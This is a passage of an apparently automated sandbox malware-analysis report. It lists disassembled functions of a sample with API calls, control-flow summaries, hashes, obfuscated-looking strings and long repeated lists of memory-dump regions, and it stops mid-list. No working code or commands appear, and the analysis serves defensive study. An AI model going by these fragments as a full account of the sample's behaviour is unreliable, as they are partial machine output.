                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0c07d9d14a549618d8a08deb31ddba5743f911b6fbe493bcc38956501bc08a9
                                                            • Instruction ID: 30548c8e1c8c31005c6ca6ad84b1535dae42a4a42b6eeaf75fd641605634b62f
                                                            • Opcode Fuzzy Hash: c0c07d9d14a549618d8a08deb31ddba5743f911b6fbe493bcc38956501bc08a9
                                                            • Instruction Fuzzy Hash: 12213CB490022A9FDB15CF94DC90BBEBBB1FF46304F244818E911BB292C735A945CF64
                                                            Function 00573220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 357 573220-57322f 358 573236-573252 357->358 359 5732a2-5732a6 RtlFreeHeap 357->359 360 5732a0 357->360 361 5732ac-5732b0 357->361 362 573286-573296 358->362 363 573254 358->363 359->361 360->359 362->360 364 573260-573284 call 575af0 363->364 364->362
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 005732A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 9a4042ead87cd73cb28b1c7b5ef3829b5baabcb0b720dcb1e6036c2f2f6c9b66
                                                            • Instruction ID: 33154bff7ffe010905e0745949096423c6c166072cbfcb7333068f035b14a902
                                                            • Opcode Fuzzy Hash: 9a4042ead87cd73cb28b1c7b5ef3829b5baabcb0b720dcb1e6036c2f2f6c9b66
                                                            • Instruction Fuzzy Hash: 18014B3450D2409BC701AF18E845A1ABBE8EF5AB11F058C2CE5C99B362D635DD64EBA2
                                                            Function 00575BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 367 575bb0-575be2 LdrInitializeThunk
                                                            APIs
                                                            • LdrInitializeThunk.NTDLL(005798C0,005C003F,00000002,00000018,?), ref: 00575BDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                            Function 00542F6F Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 368 542f6f-542f87 CoInitializeSecurity
                                                            APIs
                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00542F81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeSecurity
                                                            • String ID:
                                                            • API String ID: 640775948-0
                                                            • Opcode ID: bb583d117ab5b12361873496a5c4ecc3187389df3e47bf4eb30ecd41d7cbe6f5
                                                            • Instruction ID: 57b5e6f01ecd04900168a2e69f6d586a4dc895fd634df54a443a3950665e534e
                                                            • Opcode Fuzzy Hash: bb583d117ab5b12361873496a5c4ecc3187389df3e47bf4eb30ecd41d7cbe6f5
                                                            • Instruction Fuzzy Hash: 52C092303C9300B1F07006187C13F0420041312F21F700310F3287C1D089D17100E62D
                                                            Function 00542F10 Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 396 542f10-542f65 CoInitialize
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00542F5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 5733eac689d169d71b222ef676bb615143eb003ab00c93291af1694120030471
                                                            • Instruction ID: 1531fd817094ccf17372e50674ba2d1714d3ba1e346e6d5a3e2b7ac5c780ff2d
                                                            • Opcode Fuzzy Hash: 5733eac689d169d71b222ef676bb615143eb003ab00c93291af1694120030471
                                                            • Instruction Fuzzy Hash: B5F012A5D117006BD770BA3D9E0B7177DB8A706660F800729ECE55A7C4FA20A82DCBD7

                                                            Non-executed Functions

                                                            Function 00559510 Relevance: 20.4, Strings: 16, Instructions: 427COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                            • API String ID: 0-655414846
                                                            • Opcode ID: 83e2912d9460aef94703caeb731903daa945b359c8ffb6c4c20ceb7a9eec1651
                                                            • Instruction ID: 913db41d66221b3d92f137f0f2d1c74a69370576115e113c96d7d246b00fc652
                                                            • Opcode Fuzzy Hash: 83e2912d9460aef94703caeb731903daa945b359c8ffb6c4c20ceb7a9eec1651
                                                            • Instruction Fuzzy Hash: ABF14EB0108381ABD310DF15D891A2ABBF4FB96B49F044D1DF9D59B252E338D908DBA6
                                                            Function 0055FD10 Relevance: 5.7, Strings: 4, Instructions: 667COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
